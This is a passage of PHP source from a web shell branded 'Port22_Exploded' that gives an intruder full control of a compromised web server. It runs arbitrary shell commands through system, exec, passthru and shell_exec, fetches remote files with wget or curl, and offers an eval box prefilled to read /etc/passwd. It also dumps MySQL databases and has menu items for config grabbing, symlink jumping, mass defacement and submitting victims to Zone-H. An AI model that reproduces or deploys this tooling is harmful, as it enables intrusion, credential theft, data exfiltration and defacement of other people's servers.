510<input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
511 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
512 <td><a href=\"?y=$pwd&edit=$full\">Edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">Rename</a> | <a href=\"?y=$pwd&delete=$full\">Delete</a> | <a href=\"?y=$pwd&dl=$full\">Download</a> (<a href=\"?y=$pwd&dlgzip=$full\">Gz</a>)</td></tr>";
513 }
514 $buff .= "</table>";
515 return $buff;
516}
517
518function ukuran($file){
519 if($size = @filesize($file)){
520 if($size <= 1024) return $size;
521 else{
522 if($size <= 1024*1024) {
523 $size = @round($size / 1024,2);;
524 return "$size kb";
525 }
526 else {
527 $size = @round($size / 1024 / 1024,2);
528 return "$size mb";
529 }
530 }
531 }
532 else return "???";
533}
534
535function exe($cmd){
536 if(function_exists('system')) {
537 @ob_start();
538 @system($cmd);
539 $buff = @ob_get_contents();
540 @ob_end_clean();
541 return $buff;
542 }
543 elseif(function_exists('exec')) {
544 @exec($cmd,$results);
545 $buff = "";
546 foreach($results as $result){
547 $buff .= $result;
548 }
549 return $buff;
550 }
551 elseif(function_exists('passthru')) {
552 @ob_start();
553 @passthru($cmd);
554 $buff = @ob_get_contents();
555 @ob_end_clean();
556 return $buff;
557 }
558 elseif(function_exists('shell_exec')){
559 $buff = @shell_exec($cmd);
560 return $buff;
561 }
562}
563
564function tulis($file,$text){
565 $textz = gzinflate(base64_decode($text));
566 if($filez = @fopen($file,"w"))
567 {
568 @fputs($filez,$textz);
569 @fclose($file);
570 }
571}
572
573function ambil($link,$file) {
574 if($fp = @fopen($link,"r")){
575 while(!feof($fp)) {
576 $cont.= @fread($fp,1024);
577 }
578 @fclose($fp);
579 $fp2 = @fopen($file,"w");
580 @fwrite($fp2,$cont);
581 @fclose($fp2);
582 }
583}
584
585function which($pr){
586 $path = exe("which $pr");
587 if(!empty($path)) { return trim($path); } else { return trim($pr); }
588}
589
590function download($cmd,$url){
591 $namafile = basename($url);
592 switch($cmd) {
593 case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
594 case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
595 case 'wfread' : ambil($wurl,$namafile);break;
596 case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
597 case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
598 case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
599 case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
600 default: break;
601 }
602 return $namafile;
603}
604
605function get_perms($file)
606{
607 if($mode=@fileperms($file)){
608 $perms='';
609 $perms .= ($mode & 00400) ? 'r' : '-';
610 $perms .= ($mode & 00200) ? 'w' : '-';
611 $perms .= ($mode & 00100) ? 'x' : '-';
612 $perms .= ($mode & 00040) ? 'r' : '-';
613 $perms .= ($mode & 00020) ? 'w' : '-';
614 $perms .= ($mode & 00010) ? 'x' : '-';
615 $perms .= ($mode & 00004) ? 'r' : '-';
616 $perms .= ($mode & 00002) ? 'w' : '-';
617 $perms .= ($mode & 00001) ? 'x' : '-';
618 return $perms;
619 }
620 else return "??????????";
621}
622
623function clearspace($text){
624 return str_replace(" ","_",$text);
625}
626
627
628?>
629<html><head><link rel="SHORTCUT ICON" href="http://oi58.tinypic.com/10r33mq.jpg"><title><?=$title ?> <?=$versi ?></title>
630<script type="text/javascript">
631function tukar(lama,baru){
632 document.getElementById(lama).style.display = 'none';
633 document.getElementById(baru).style.display = 'block';
634}
635</script><style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1048.cur), progress !important;}</style>
636<style type="text/css">
637body { background-color:transparan;background:#000;background-image: url("<?=$background; ?>");background-position: center; background-attachment: fixed;background-repeat: no-repeat; }
638a {text-decoration:none;
639}
640a:hover{
641border-bottom:1px solid #00ff00;
642}
643*{
644 font-size:11px;
645 font-family:Tahoma,Verdana,Arial;
646 color:<?=$color; ?>;
647}
648#menu{
649 background-color:transparan;
650 margin:8px 2px 4px 2px;
651}
652
653#menu a{
654 padding:4px 18px;
655 margin:0;
656 background:#222222;
657 text-decoration:none;
658 letter-spacing:2px;
659 -moz-border-radius: 5px; -moz-box-shadow-webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
660}
661#menu a:hover{
662 background:#191919;
663 border-bottom:1px solid #333333;
664 border-top:1px solid #333333;
665}
666
667.tabnet{
668 margin:15px auto 0 auto;
669 border: 1px solid #333333;
670 color: #FFCC00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;}
671.msupiani{ font-family:Vivaldi;font-size:50px;color: #00FF00;}
672.tabnet{
673 margin:15px auto 0 auto;
674 border: 1px solid #333333; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
675}
676.main {
677 width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
678}
679.gaya {
680 color: $color;
681}
682.inputz{
683 background:#111111;
684 border:0;
685 padding:2px;
686 border-bottom:1px solid #222222;
687 border-top:1px solid #222222; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
688}
689.inputzbut{
690 background:#111111;
691 color:<?=$color; ?>;
692 margin:0 4px;
693 border:1px solid #444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
694
695}
696.inputz:hover, .inputzbut:hover{
697 border-bottom:1px solid #00ff00;
698 border-top:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
699}
700.output {
701 margin:auto;
702 border:1px solid <?=$color; ?>;
703 width:100%;
704 height:400px;
705 background:#000000;
706 padding:0 2px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
707}
708.cmdbox{
709 width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
710}
711.head_info{
712 padding: 0 4px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
713}
714.exploded{
715 font-size:30px;
716 padding:0;
717 color:#444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
718}
719.exploded_tbl{
720 text-align:center;
721 margin:0 4px 0 0;
722 padding:0 4px 0 0;
723 border-right:1px solid #333333;
724}
725.phpinfo table{
726 width:100%;
727 padding:0 0 0 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
728}
729.phpinfo td{
730 background:#111111;
731 color:#cccccc;
732padding:6px 8px;; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
733}
734.phpinfo th, th{
735 background:#191919;
736 border-bottom:1px solid #333333;
737font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
738}
739.phpinfo h2, .phpinfo h2 a{
740 text-align:center;
741 font-size:16px;
742 padding:0;
743 margin:30px 0 0 0;
744 background:#222222;
745 padding:4px 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
746}
747.explore{
748width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
749}
750.explore a {
751text-decoration:none;
752}
753.explore td{
754border-bottom:1px solid #333333;
755padding:0 8px;
756line-height:24px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
757}
758.explore th{
759padding:3px 8px;
760font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
761}
762.explore th:hover , .phpinfo th:hover{
763border-bottom:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
764}
765.explore tr:hover{
766background:#111111; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
767}
768.viewfile{
769background:#EDECEB;
770color:#000000;
771margin:4px 2px;
772padding:8px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
773}
774.sembunyi{
775display:none;
776padding:0;margin:0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
777}
778.jaya{ margin:5px; text-align:right; <?=$color; ?>;}
779.footer{ background:#111111; width:99%; padding:5px; margin:10px auto 5px; text-align:center; font-size:13px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ; }
780.footer a{ font-size:14px; }
781.footer span{ font-size:14px;}
782</style></head>
783
784<body onLoad="document.getElementById('cmd').focus();">
785<!-- logout start here -->
786<div id="menu"><span style='float:right;'><br>
787<?="Time On Server : <b> ".date("d M Y H:i:s",time())."</b>"; ?> <br><br>        
788<a href="?<?="y=".$pwd; ?>&x=kill" title='Remove Shell'>Remove</a>
789 |
790<a href="?<?="y=".$pwd; ?>&x=logout" title='Logout'>Logout</a>       <br><br>
791                          <a href="?<?="y=".$pwd; ?>&x=about" title='About Author'>About</a>
792</span></div>
793<!-- logout end here -->
794<div class="main">
795<!-- head info start here -->
796<div class="head_info">
797<table><tr>
798<td><table class="inputz"><tr><td><a href="" target="blank" onClick="location.reload();"><span class="F0ku5"><img src='<?=$logo; ?>' title="Security Exploded" width="150" height="150"></span></span></a></td></tr><tr><td>
799<a href="http://twitter.com/Port22_Exploded" class="twitter-follow-button" data-show-count="false"> Follow @Port22_Exploded</a>
800<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'http';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script></td></tr></table></td>
801<td><?=$buff; ?></td>
802</tr></table></div>
803<!-- head info end here -->
804<!-- menu start --><br>
805<center><div id="menu">
806<a href="?"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=' height="18" width="34" title='Home '></a>
807<a href="?<?="y=".$pwd; ?>" title='File Explorer'>Files</a>
808<a href="?<?="y=".$pwd; ?>&x=upload" title='Upload File'>Uploader</a>
809<a href="?<?="y=".$pwd; ?>&x=sql" title='Connect To Database'>MySQL Manager</a><br><br>
810<a href="?<?="y=".$pwd; ?>&x=jumping" title='Jumping'>Jumper</a>
811<a href="?<?="y=".$pwd; ?>&x=symlink" title='Symlink'>Multi Symlinker</a>
812<a href="?<?="y=".$pwd; ?>&x=grabc" title='Config Grabber'>Config Grabber</a><br><br>
813<a href="?<?="y=".$pwd; ?>&x=mass" title='Deface To All Folder'>Mass Directory Defacer</a>
814<a href="?<?="y=".$pwd; ?>&x=zone" title='Submit Victim To Zone-H'>Zone-H Submiter</a>
815</div></center><br>
816<!-- menu end -->
817<?php
818@ini_set('display_errors', 0);
819@ini_set('output_buffering',0);
820
821if(isset($_GET['x']) && ($_GET['x'] == 'kill')) {
822
823 echo "
824<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
825
826 <tr>
827 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
828 <center><b><font size=5 style=italic color=#00ff00>Shell Killer</font></b></center></td></tr></table>
829";
830
831echo '<center><br><font style="color:<?=$color; ?>">Do You Really Want To Delete This Shell ?</b></center><br>';
832?>
833<center>
834<div id="menu">
835<a href="?<?="y=".$pwd;?>&x=killit" title='Remove Shell' >Yes, I Want</font></a>
836<a href="<?=$_SERVER['PHP_SELF']; ?>">Cancel</a></b></center><br><br>
837</div>
838<?php
839}
840if(isset($_GET['x']) && ($_GET['x'] == 'killit')) {
841$file = $_SERVER['PHP_SELF'];
842if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
843die('<br><br><b class="tmp"><font color="#ff0000" size="2pt"><center>Shell Has Been Killed... Take Care And Stay Safe</center></font></b><meta http-equiv="refresh" content="3; url=?".$pwd."" />');
844else
845echo '<font color="#fff600" size="2pt">Unlink Error !</font>';
846
847}
848/////////////////////////////
849elseif(isset($_GET['x']) && ($_GET['x'] == 'php'))
850{
851@ini_set('output_buffering',0);
852echo "
853<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
854
855 <tr>
856 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
857 <center><b><font size=5 style=italic color=#00ff00>Eval</font></b></center></td></tr></table>
858";
859 ?>
860
861<form action="?y=<?=$pwd; ?>&x=php" method="post">
862<table class="tabnet" style="width:800px;height:300px">
863<tr><td>
864<textarea class="output" name="cmd" id="cmd">
865<?php
866if(isset($_POST['submitcmd'])) {
867 echo eval(magicboom($_POST['cmd']));
868}
869else echo "echo file_get_contents('/etc/passwd');";
870?>
871</textarea>
872<tr><td><input style="width:800px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
873</table>
874</form>
875
876<?php }
877
878/////////////////////////////
879///////////////////////////////////////////////////////////////////////////////
880elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')){
881 echo "
882<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
883
884 <tr>
885 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
886 <center><b><font size=5 style=italic color=#00ff00>MySQL Manager</font></b></center></td></tr></table>
887";
888function view_size($size) {
889 if (!is_numeric($size)) { return FALSE; }
890 else {
891if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
892elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
893elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
894else {$size = $size . " B";}
895return $size;
896 }
897}
898function mysql_dump($set) {
899 $sock = $set["sock"];
900 $db = $set["db"];
901 $print = $set["print"];
902 $nl2br = $set["nl2br"];
903 $file = $set["file"];
904 $add_drop = $set["add_drop"];
905 $tabs = $set["tabs"];
906 $onlytabs = $set["onlytabs"];
907 $ret = array();
908 $ret["err"] = array();
909 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
910 if (empty($db)) {$db = "db";}
911 if (empty($print)) {$print = 0;}
912 if (empty($nl2br)) {$nl2br = 0;}
913 if (empty($add_drop)) {$add_drop = TRUE;}
914 if (empty($file)) {
915$file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
916 }
917 if (!is_array($tabs)) {$tabs = array();}
918 if (empty($add_drop)) {$add_drop = TRUE;}
919 if (sizeof($tabs) == 0) {
920$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
921if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
922 }
923 $out = "
924 # Dumped By ".$xName."
925 # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
926 # Date: ".date("d.m.Y H:i:s")."
927 # DB: \"".$db."\"
928 #---------------------------------------------------------";
929 $c = count($onlytabs);
930 foreach($tabs as $tab) {
931if ((in_array($tab,$onlytabs)) or (!$c)) {
932 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
933 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
934 if (!$res) {$ret["err"][] = mysql_smarterror();}
935 else {
936$row = mysql_fetch_row($res);
937$out .= $row["1"].";\n\n";
938$res = mysql_query("SELECT * FROM `$tab`", $sock);
939if (mysql_num_rows($res) > 0) {
940 while ($row = mysql_fetch_assoc($res)) {
941$keys = implode("`, `", array_keys($row));
942$values = array_values($row);
943foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
944$values = implode("', '", $values);
945$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
946$out .= $sql;
947 }
948}
949 }
950}
951 }
952 $out .= "#---------------------------------------------------------------------------------\n\n";
953 if ($file) {
954$fp = fopen($file, "w");
955if (!$fp) {$ret["err"][] = 2;}
956else {
957 fwrite ($fp, $out);
958 fclose ($fp);
959}
960 }
961 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
962 return $out;
963}
964function mysql_buildwhere($array,$sep=" and",$functs=array()) {
965 if (!is_array($array)) {$array = array();}
966 $result = "";
967 foreach($array as $k=>$v) {
968$value = "";
969if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
970$value .= "'".addslashes($v)."'";
971if (!empty($functs[$k])) {$value .= ")";}
972$result .= "`".$k."` = ".$value.$sep;
973 }
974 $result = substr($result,0,strlen($result)-strlen($sep));
975 return $result;
976}
977function mysql_fetch_all($query,$sock) {
978 if ($sock) {$result = mysql_query($query,$sock);}
979 else {$result = mysql_query($query);}
980 $array = array();
981 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
982 mysql_free_result($result);
983 return $array;
984}
985function mysql_smarterror($sock) {
986 if ($sock) { $error = mysql_error($sock); }
987 else { $error = mysql_error(); }
988 $error = htmlspecialchars($error);
989 return $error;
990}
991function mysql_query_form() {
992 global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
993 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
994 if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
995 if ((!$submit) or ($sql_x)) {
996echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
997if ($tbl_struct) {
998 echo "<td valign=\"top\"><b>Fields:</b><br>";
999 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
1000 echo "</td></tr></table>";
1001}
1002 }
1003 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
1004}
1005function mysql_create_db($db,$sock="") {
1006 $sql = "CREATE DATABASE `".addslashes($db)."`;";
1007 if ($sock) {return mysql_query($sql,$sock);}
1008 else {return mysql_query($sql);}
1009}
1010function mysql_query_parse($query) {
1011 $query = trim($query);
1012 $arr = explode (" ",$query);
1013 $types = array(
1014"SELECT"=>array(3,1),
1015"SHOW"=>array(2,1),
1016"DELETE"=>array(1),
1017"DROP"=>array(1)
1018 );
1019 $result = array();
1020 $op = strtoupper($arr[0]);
1021 if (is_array($types[$op])) {
1022$result["propertions"] = $types[$op];
1023$result["query"] = $query;
1024if ($types[$op] == 2) {
1025 foreach($arr as $k=>$v) {
1026if (strtoupper($v) == "LIMIT") {
1027 $result["limit"] = $arr[$k+1];
1028 $result["limit"] = explode(",",$result["limit"]);
1029 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
1030 unset($arr[$k],$arr[$k+1]);
1031}
1032 }
1033}
1034 }
1035 else { return FALSE; }
1036}
1037function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
1038function html_style() {
1039$style = ' <style type="text/css"> a { text-decoration:none; } a:hover { color: #00ff00; border-bottom:1px solid #00ff00; } input[type="text"], input[type="password"], select{ background:#111111; border:0; padding:2px; border:1px solid #444444; } input[type="submit"]{ background:#111111; color:#ffffff; margin:0 4px; border:1px solid #444444;} input[type="text"]:hover, input[type="submit"]:hover, input[type="password"]:hover, select:hover{ border-bottom:1px solid #00ff00;border-top:1px solid #00ff00;} .tab { width:100%; } th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .tub { width:100%; } .tub th{ border-bottom:1px solid #00ff00; padding:3px;} .tub tr:hover{ background:#006400; } .tub td{ border-bottom:1px solid #333333; padding-left:3px; } #maininfo { padding:5px; margin-top:10px; margin-left:2px; margin-right:2px; background:#191919; } #maininfo a{ color:#00ff00; } textarea { background:#000000; border:1px solid #444444;} textarea:hover { border:1px solid #00ff00;} </style><center>';
1040return $style;
1041}
1042$auto_surl = TRUE;
1043foreach ($_REQUEST as $k => $v) {
1044 if (!isset($$k)) { $$k = $v; }
1045}
1046if ($auto_surl) {
1047 $include = "&";
1048 foreach (explode("&",getenv("QUERY_STRING")) as $v) {
1049$v= explode("=",$v);
1050$name= urldecode($v[0]);
1051$value= @urldecode($v[1]);
1052$needles = array("http://","https://","ssl://","ftp://","\\\\");
1053foreach ($needles as $needle) {
1054 if (strpos($value,$needle) === 0) {
1055$includestr .= urlencode($name)."=".urlencode($value)."&";
1056 } } } }
1057if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
1058if (!isset($x)) { $x = "sql"; }
1059 if ($x == "sql") {
1060 foreach (array("sort","sql_sort") as $v) {
1061if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
1062if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
1063 }
1064 if ($sort_save) {
1065if (!empty($sort)) { setcookie("sort",$sort); }
1066if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
1067 }
1068 if (!isset($sort)) { $sort = $sort_default; }
1069 $sort = htmlspecialchars($sort);
1070 $sort[1] = strtolower($sort[1]);
1071 echo html_style();
1072echo "<div id='maininfo'>";
1073 if ($x == "sql") {
1074 $sql_surl = $surl."x=sql";
1075 if (!isset($sql_login)) { $sql_login = ""; }
1076 if (!isset($sql_passwd)) { $sql_passwd = ""; }
1077 if (!isset($sql_server)) { $sql_server = ""; }
1078 if (!isset($sql_port)) { $sql_port = ""; }
1079 if (!isset($sql_tbl)) { $sql_tbl = ""; }
1080 if (!isset($sql_x)) { $sql_x = ""; }
1081 if (!isset($sql_tbl_x)) { $sql_tbl_x = ""; }
1082 if (!isset($sql_order)) { $sql_order = ""; }
1083 if (!isset($sql_x)) { $sql_x = ""; }
1084 if (!isset($sql_getfile)) { $sql_getfile = ""; }
1085 if (@$sql_login) { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
1086 if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
1087 if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
1088 if (@$sql_port){ $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
1089 if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
1090 $sql_surl .= "&";
1091 echo "";
1092 if (@$sql_server) {
1093$sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
1094$err = mysql_smarterror($sql_sock);
1095@mysql_select_db($sql_db,$sql_sock);
1096if (@$sql_query and $submit) {
1097 $sql_query_result = mysql_query($sql_query,$sql_sock);
1098 $sql_query_error = mysql_smarterror($sql_sock);
1099}
1100 }
1101 else { $sql_sock = FALSE; }
1102 if (!$sql_sock) {
1103if (!@$sql_server) { echo "<blink><b><font style= color:#ff0000>No Connection ! ! !</font></b></blink>"; }
1104else { disp_error("ERROR: ".$err); }
1105 }
1106 else {
1107#SQL Quicklaunch
1108$sqlquicklaunch= array();
1109$sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
1110$sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
1111$sqlquicklaunch[] = array("Server status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
1112$sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
1113$sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
1114$sqlquicklaunch[] = array("Logout",$surl."x=sql");
1115echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
1116if (count($sqlquicklaunch) > 0) {
1117 foreach($sqlquicklaunch as $item) {
1118echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
1119 }
1120 }
1121 }
1122echo "</div>";
1123echo "<center><table class='tab'><tr>";
1124 if (!$sql_sock) {
1125 echo '<td>
1126<form name="f_sql" action="'.$surl.'x=sql" method="POST">
1127<input type="hidden" name="x" value="sql">
1128<table class="tabnet" style="padding:1px;">
1129<tr><th colspan="2"><b>MySQL Manager</b></th></tr>
1130<tr><td>Host</td><td><input type="text" name="sql_server" class="inputz" style="width:249px;background:black" value="localhost"></td></tr>
1131<tr><td>Username</td><td><input type="text" name="sql_login" class="inputz" value="" style="width:249px;background:black"></td></tr>
1132<tr><td>Password</td><td><input type="password" name="sql_passwd" class="inputz" value="" style="width:249px;background:black;"></td></tr>
1133<tr><td>Database</td><td><input type="text" name="sql_db" value="" class="inputz" style="width:249px;background:black"></td></tr>
1134<tr><td>Port</td><td><input type="text" name="sql_port" class="inputz" value="3306" style="background:black;" size="6"> <input type="submit" class="inputzbut" style=color:$color value="Connect"></td></tr>
1135</table>
1136</form>';
1137 }
1138 else {
1139 echo '<td valign="top" style="border:1px solid #333333;">
1140<center>
1141<a href="'.$sql_surl.'"><b style="color:#00ff00;">HOME</b></a>
1142<hr size="1" noshade>';
1143 $result = mysql_list_dbs($sql_sock);
1144 if (!$result) { echo mysql_smarterror(); }
1145 else {
1146 echo '<form action="'.$surl.'x=sql">
1147<input type="hidden" name="x" value="sql">
1148<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1149<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1150<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1151<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1152<select name="sql_db" onchange="this.form.submit()" style="width:100%;">';
1153$c = 0;
1154$dbs = "";
1155while ($row = mysql_fetch_row($result)) {
